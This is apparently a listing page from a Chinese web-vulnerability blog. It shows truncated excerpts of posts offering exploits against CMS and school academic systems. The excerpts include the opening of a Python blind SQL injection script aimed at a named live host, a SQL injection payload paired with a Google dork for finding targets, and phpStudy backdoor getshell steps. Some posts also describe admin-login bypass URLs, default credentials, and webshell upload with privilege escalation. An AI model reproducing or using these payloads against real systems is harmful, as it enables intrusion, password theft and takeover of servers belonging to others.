tipask注入漏洞(附exp)

小俊 | WEB漏洞大全 | 2020-03-14
#encoding=utf-8 #tipask注入利用 import requests #目标站 url = "http://help.tipask.com" length = 0 user = "" while True: length = length + 1 l = "(select if(length((select concat(username,0x3a,passwo [阅读全文]
ė153次浏览 60条评论 0

齐博CMS的splitword.php后门解密

小俊 | WEB漏洞大全 | 2020-03-14
笔者找了去年某云5月爆出的远程命令执行漏洞,源码百度一下,本地测试效果。   用sublime打开源码,源码经过加密压缩为一行。下面我们将一步步的揭开加密代码,查看这个命令执行到底是怎么一回事   找个在线php代码格式画工具快速格式化一下http://beta.phpformatter.com/。解密思 [阅读全文]
ė128次浏览 60条评论 0

opensns秒进后台漏洞

小俊 | WEB漏洞大全 | 2020-03-14
这个是在给客户做渗透测试的时候发现的。 powered by  随便日 秒进有2处地方: 一个是普通用户登录,一处管理登录(默认) http://a.com/index.php?s=/ucenter/member/login.html 普通用户登录 http://a.com/index.php?s=/admin/publi [阅读全文]
ė212次浏览 60条评论 0

Phpstudy后门漏洞的利用方法之getshell

小俊 | WEB漏洞大全 | 2020-03-09
0x01 phpstudy利用方法 请求任意后缀为php的文件 目标环境为php5.2,5.4,且不能为nts 存在Accept-Encoding: gzip,deflate 此处填写base64加密后的payload:accept-charset: [阅读全文]
ė920次浏览 60条评论 0

ASPX网站的0day

小俊 | WEB漏洞大全 | 2020-03-08
直接爆出管理密码。  也是利用注入漏洞。  谷歌搜索关键字:inurl:scoreindex.aspx 利用代码  cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar [阅读全文]
ė207次浏览 60条评论 0

通用型正方教务(通杀各版本)存在注入(不需登陆)+获得webshell+提权内网漫游

小俊 | WEB漏洞大全 | 2020-03-08
简要描述: 某个接口页面存在oracle盲注,可以获得当前用户数据库,dump教师用户表,分析密文加密特征(前人研究成果+基友助攻),破译加密的密码。前台管理员登陆,后台文件上传基于黑名单原理,过滤u完全,上传特定文件,生成一句话。菜刀连接,大马提权。 详细说明: 百度搜索:“欢迎使用正方教务管理系统!请登录” 可获得几十页的词 [阅读全文]
ė158次浏览 60条评论 0

Metinfo 5.3.17 前台SQL注入漏洞

小俊 | WEB漏洞大全 | 2020-03-08
Metinfo 8月1日升级了版本,修复了一个影响小于等于5.3.17版本(几乎可以追溯到所有5.x版本)的SQL注入漏洞。这个SQL注入漏洞不受软WAF影响,可以直接获取数据,影响较广。 0x01. 漏洞原理分析 漏洞出现在 /include/global.func.php 文件的 jump_pseudo 函数: get_one($query); [阅读全文]
ė440次浏览 60条评论 0

CLTPHP_v5.5.3 前台Getshelll漏洞

小俊 | WEB漏洞大全 | 2020-03-08
默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin 密码:admin123 代码分析 1、漏洞文件位置:/app/user/controller/UpFiles.php 第5-25行: 在这段函数中,未经用户权限验证,获取表单内容,存在 [阅读全文]
ė252次浏览 60条评论 0

zzcms 8.2 任意用户密码修改漏洞

小俊 | WEB漏洞大全 | 2020-03-08
seebug是个好东西  任意用户密码重置方式一 任意前台用户密码重置,后台管理员重置不了 本地复现开始 注册个账号,然后首页点击找回密码 http://localhost/one/getpassword.php 这里存在用户遍历,如果存在该用户,那么返回在前端页面的就是 [阅读全文]
ė181次浏览 60条评论 0

正方教务系统漏洞利用exp

小俊 | WEB漏洞大全 | 2020-03-03
#!/usr/bin/env python # -*- coding: utf-8 -*- #author: Windy import os import re import sys import urllib2 import httplib import random import time import string import requests from bs4 import Beau [阅读全文]
ė622次浏览 60条评论 0

Ɣ回顶部